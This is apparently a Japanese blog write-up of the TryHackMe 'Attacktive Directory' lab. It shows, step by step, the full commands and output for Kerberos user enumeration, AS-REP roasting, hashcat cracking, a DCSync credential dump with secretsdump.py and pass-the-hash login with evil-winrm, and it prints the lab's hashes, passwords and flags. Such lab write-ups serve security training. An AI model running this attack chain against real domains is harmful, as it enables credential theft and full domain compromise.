[TryHackMe] Attacktive Directory #Writeup

はじめに

備忘録です。Task 1, 2 は飛ばして Task 3 から。

Task 3 [Welcome to Attacktive Directory]

What tool will allow us to enumerate port 139/445?

139と445番ポートについて調べてみると、共にWindows標準の通信規約（プロトコル）であるSMB（Server Message Block）によって、ファイル共有やプリンタ共有を行うために利用するポートであることが分かった。

参考：

Windowsのネットワーク機能はよくサイバー攻撃の標的となるため、何らかの事情でどうしても必要でない限り、445番および137～139番ポートはインターネット側から内部ネットワークへ向かって接続できないようルータやファイアウォールなどに設定しておく必要がある。

よくサイバー攻撃の標的にされるらしい。

"port 139 445 enumerate" でググると、enum4linuxというWindowsとSambaから情報を抽出するツールを発見する。

enum4linux

What is the NetBIOS-Domain Name of the machine?

とりあえずenum4linuxを使用するっぽいのでnmapでポートが開いているか確認する。

nmap -A 10.10.159.205

Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-11 02:28 BST
Nmap scan report for ip-10-10-159-205.eu-west-1.compute.internal (10.10.159.205)
Host is up (0.0021s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-11 01:29:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2024-07-10T01:04:28
|_Not valid after:  2025-01-09T01:04:28
|_ssl-date: 2024-07-11T01:30:13+00:00; -1s from scanner time.

以下略

139も445もどちらも開いていた。

$ enum4linux 10.10.159.205

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jul 11 02:37:05 2024

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.159.205
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.159.205    |
 ===================================================== 
[+] Got domain/workgroup name: THM-AD

 ============================================= 
|    Nbtstat Information for 10.10.159.205    |
 ============================================= 
Looking up status of 10.10.159.205
	ATTACKTIVEDIREC <00> -         B <ACTIVE>  Workstation Service
	THM-AD          <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	THM-AD          <1c> - <GROUP> B <ACTIVE>  Domain Controllers
	THM-AD          <1b> -         B <ACTIVE>  Domain Master Browser
	ATTACKTIVEDIREC <20> -         B <ACTIVE>  File Server Service

	MAC Address = 02-F1-30-43-D5-17

 ====================================== 
|    Session Check on 10.10.159.205    |
 ====================================== 
[+] Server 10.10.159.205 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.159.205    |
 ============================================ 
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

 ======================================= 
|    OS information on 10.10.159.205    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
[+] Got OS info for 10.10.159.205 from smbclient: 
[+] Got OS info for 10.10.159.205 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

以下略

あった！

[+] Got domain/workgroup name: THM-AD

THM-AD

What invalid TLD do people commonly use for their Active Directory Domain?

TLDとは、トップレベルドメインの略。.comとか.jpがトップレベルドメイン。

アクティブディレクトリではドメインが必須で、独自ドメインを持っていない場合は.localをつける必要がある。

.local

Task 4 [Enumerating Users via Kerberos]

What command within Kerbrute will allow us to enumerate valid usernames?

まずはkerbruteをダウンロードしてみる。

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

ダウンロードしたファイルに実行権限がないので付与する。

chmod 700 kerbrute_linux_amd64

使い方を調べる。

$ ./kerbrute_linux_amd64 -h

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/11/24 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

Use "kerbrute [command] --help" for more information about a command.

Githubにも載っていた。

userenum

Target Machineが途中でTerminateしてしまったので攻撃先IPが 10.10.179.67 に変わりました。

What notable account is discovered? (These should jump out at you)

渡されたUser Listを使ってアカウントを列挙する。
User Listはここからダウンロードできた。

wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt

これで列挙できるみたい。

./kerbrute_linux_amd64 userenum --dc [target IP] -d spookysec.local [user_list_path] -t 50

./kerbrute_linux_amd64 userenum --dc 10.10.179.67 -d spookysec.local /root/userlist.txt -t 50

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/11/24 - Ronnie Flathers @ropnop

2024/07/11 06:40:43 >  Using KDC(s):
2024/07/11 06:40:43 >  	10.10.179.67:88

2024/07/11 06:40:43 >  [+] VALID USERNAME:	 james@spookysec.local
2024/07/11 06:40:43 >  [+] VALID USERNAME:	 svc-admin@spookysec.local
2024/07/11 06:40:43 >  [+] VALID USERNAME:	 James@spookysec.local
2024/07/11 06:40:43 >  [+] VALID USERNAME:	 robin@spookysec.local
2024/07/11 06:40:43 >  [+] VALID USERNAME:	 darkstar@spookysec.local
2024/07/11 06:40:44 >  [+] VALID USERNAME:	 administrator@spookysec.local
2024/07/11 06:40:44 >  [+] VALID USERNAME:	 backup@spookysec.local
2024/07/11 06:40:44 >  [+] VALID USERNAME:	 paradox@spookysec.local
2024/07/11 06:40:46 >  [+] VALID USERNAME:	 JAMES@spookysec.local
2024/07/11 06:40:46 >  [+] VALID USERNAME:	 Robin@spookysec.local
2024/07/11 06:40:52 >  [+] VALID USERNAME:	 Administrator@spookysec.local
2024/07/11 06:41:08 >  [+] VALID USERNAME:	 Darkstar@spookysec.local
2024/07/11 06:41:13 >  [+] VALID USERNAME:	 Paradox@spookysec.local
2024/07/11 06:41:29 >  [+] VALID USERNAME:	 DARKSTAR@spookysec.local
2024/07/11 06:41:34 >  [+] VALID USERNAME:	 ori@spookysec.local
2024/07/11 06:41:43 >  [+] VALID USERNAME:	 ROBIN@spookysec.local
2024/07/11 06:42:04 >  Done! Tested 73317 usernames (16 valid) in 81.200 seconds

結構いっぱいでてきた。
Adminも複数いますね。
文字数的にそれっぽいやつを入れるとヒット！

svc-admin

What is the other notable account is discovered? (These should jump out at you)

答えは6文字。6文字のアカウントは一つしかなかった。

backup

Task 5 [Abusing Kerberos]

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

解答欄の文字数見たら答えがわかっちゃった

Active Directory では Kerberos認証が使用されている。ユーザーアカウントに「事前認証を必要としない」特権が設定されている際、ASREPRoasting と呼ばれる攻撃手法で、Kerberos認証内の機能を悪用することができる。

この ASREPRoasting を使うために「事前認証を必要としない」特権が設定されているかをImpacketのGetNPUsers.pyを使用して調べる。GetNPUsers.py は Key Distribution Center から ASReproastable アカウントに問い合わせてTGT（チケット）を入手することができる。

GetNPUsers.py -no-pass -dc-ip 10.10.179.67 spookysec.local/backup
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Getting TGT for backup
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set

残念。

GetNPUsers.py -no-pass -dc-ip 10.10.179.67 spookysec.local/svc-admin
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:9a639feaf9b26c2584f89a7fa5f0d89a$f2b2471556ff0029542dffbd643f5ef2ab6bd779f257df6566c2f4831b5dffa0983f597390e081fa902fffc07af960abf589d3bc582976fc473b9d4bf6f1ffa83cc000218a80169eb225712645e62e464ebff21d3405a1f15a922e6bc7f3016c6001d0eca37d770584d5bcd759d27ef9256cf8116e3df7cd7a27336bda5c32ba4c46f47258a5c9ff1ffeade19b0d0e46d3e2c0e3829cb4e5691388722b894fda7eff7644ae5126689eb27a1144871896ad0b4a601b25d1954b254ca28af60721a2f94fbaa15b0206131c050f6dc31b050464b2fe37eae95018a41bb10451dd949d2d7d30f95137f303db83534818bb47a3e4

アタリ。

svc-admin

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

https://hashcat.net/wiki/doku.php?id=example_hashes and searching for the first part will help!

ヒント曰く、hashcatのwikiで先ほどのチケットの最初の部分を検索する。
ヒットした。

18200 Kerberos 5, etype 23, AS-REP $krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8116d6407a782ea0e1c5402b17db7afa6b05a6d30ed164a9933c754d720e279c6c573679bd27128fe77e5fea1f72334c1193c8ff0b370fadc6368bf2d49bbfdba4c5dccab95e8c8ebfdc75f438a0797dbfb2f8a1a5f4c423f9bfc1fea483342a11bd56a216f4d5158ccc4b224b52894fadfba3957dfe4b6b8f5f9f9fe422811a314768673e0c924340b8ccb84775ce9defaa3baa0910b676ad0036d13032b0dd94e3b13903cc738a7b6d00b0b3c210d1f972a6c7cae9bd3c959acf7565be528fc179118f28c679f6deeee1456f0781eb8154e18e49cb27b64bf74cd7112a0ebae2102ac

Kerberos 5, etype 23, AS-REP

What mode is the hash?

さっきのhashcatの表の左列がmodeらしい。

18200

Now crack the hash with the modified password list provided, what is the user accounts password?

hashのタイプがわかったのでhashcatを使ってパスワードをクラックする。
パスワードリストは既に与えられていたのでそれも使う。
また、先ほど与えられたハッシュもファイルを作って書き込む。

wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

nano hash.txt & さっきのハッシュをコピペ

hashcat 実行！

$ hashcat -m 18200 hash.txt passwordlist.txt --force

hashcat (v6.1.1-66-g6a419d06) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7571, 3832/3896 MB (974 MB allocatable), 2MCU

OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
===========================================================================================================================
* Device #2: pthread-AMD EPYC 7571, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 35 MB

Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:9a639feaf9b26c2584f89a7fa5f0d89a$f2b2471556ff0029542dffbd643f5ef2ab6bd779f257df6566c2f4831b5dffa0983f597390e081fa902fffc07af960abf589d3bc582976fc473b9d4bf6f1ffa83cc000218a80169eb225712645e62e464ebff21d3405a1f15a922e6bc7f3016c6001d0eca37d770584d5bcd759d27ef9256cf8116e3df7cd7a27336bda5c32ba4c46f47258a5c9ff1ffeade19b0d0e46d3e2c0e3829cb4e5691388722b894fda7eff7644ae5126689eb27a1144871896ad0b4a601b25d1954b254ca28af60721a2f94fbaa15b0206131c050f6dc31b050464b2fe37eae95018a41bb10451dd949d2d7d30f95137f303db83534818bb47a3e4:management2005
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:9a639feaf9b...47a3e4
Time.Started.....: Thu Jul 11 08:58:59 2024, (0 secs)
Time.Estimated...: Thu Jul 11 08:58:59 2024, (0 secs)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   362.2 kH/s (7.41ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8192/70188 (11.67%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 4096/70188 (5.84%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: newzealand -> whitey

Started: Thu Jul 11 08:58:13 2024
Stopped: Thu Jul 11 08:59:00 2024

クラック成功です。ハッシュドポテト食べたい。

management2005

Task 6 [Back to the Basics]

What utility can we use to map remote SMB shares?

Hint : man smbclient will tell you a little bit about the tool!

教えてもらいました。

smbclient

Which option will list shares?

ググった。

-L

How many remote shares is the server listing?

smbclientを実行してサーバー上で利用可能なサービスを表示させる。

smbclient -L 10.10.179.67 -U svc-admin%management2005
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backup          Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.179.67 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

6

There is one particular share that we have access to that contains a text file. Which share is it?

backupが怪しい。

$ smbclient \\\\10.10.179.67\\backup -U 'svc-admin'
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 20:08:39 2020
  ..                                  D        0  Sat Apr  4 20:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 20:08:53 2020

		8247551 blocks of size 4096. 4118567 blocks available

入れた。なんかあった。

backup

What is the content of the file?

ファイルをゲットして中身を見る。

smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> q
root@ip-10-10-142-28:~# cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYwr

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYwr

Decoding the contents of the file, what is the full contents?

先ほどの問題のヒントにファイルの中身はエンコードされていると書かれている。
base64でデコードしてみる。

$ base64 -d backup_credentials.txt
backup@spookysec.local:backup2517860

backup@spookysec.local:backup2517860

Task 7 [Elevating Privileges within the Domain]

What method allowed us to dump NTDS.DIT?

説明文要約

　先ほど取得したbackupはドメイン・コントローラーのバックアップ・アカウントである。このアカウントは、すべてのActive Directoryの変更をこのユーザーアカウントと同期させる独自の権限を持っている。これにはパスワードハッシュも含まれる。

　これを知っていれば、"secretsdump.py"というImpacketの別のツールを使うことができる。これを使用することにより、このユーザーアカウント（ドメインコントローラーと同期している）が持っているすべてのパスワードハッシュを取得することができる。これを利用することで、実質的にADドメインを完全にコントロールすることができる。

ちょっと何言ってるかわかんない。Try Harder!
とりあえず、secretsdump.pyをゲットして実行してみる。

$ wget https://github.com/fortra/impacket/blob/master/examples/secretsdump.py

$ secretsdump.py -just-dc backup:backup2517860@10.10.34.196
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:2e083a5eb7dbeb20c46047a186a52e72:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:7019176ac0bb2a2e4bed04d8efffc8d85be1bb2e9524d2a43ca445d22eba14ba
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:59ab88967eb69596d0e78347d6401bc9
ATTACKTIVEDIREC$:des-cbc-md5:a1b6313bc861fdc7
[*] Cleaning up... 

Administrator:500の後ろのほうの:の後が答え

0e0363213e37b94221497260b0bcb4fc

What method of attack could allow us to authenticate as the user without the password?

ググった。

Pass The Hash

Using a tool called Evil-WinRM what option will allow us to use a hash?

Evil-WinRM ワルそうな名前ですね～
インストール。

-hだとヘルプになっちゃうので注意。

-H

Task 8 Flag Submission Panel

問題の順番が前後します。あと、攻撃先IPが変わりました。

Administrator

evil-wirnmを使ってAdministratorで探索する。

evil-winrm -i 10.10.160.40 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

デスクトップに移動するとroot.txtがあった。

TryHackMe{4ctiveD1rectoryM4st3r}

svc-admin

ここからはEasyですね。
user.txt.txtがsvc-adminのデスクトップにあった。

TryHackMe{K3rb3r0s_Pr3_4uth}

backup

ラスト！長かった、、
PrivEsc.txtがデスクトップにあった。

TryHackMe{B4ckM3UpSc0tty!}

感想

初のAD攻略でした。
全然わからんかった。。。
Try Harder!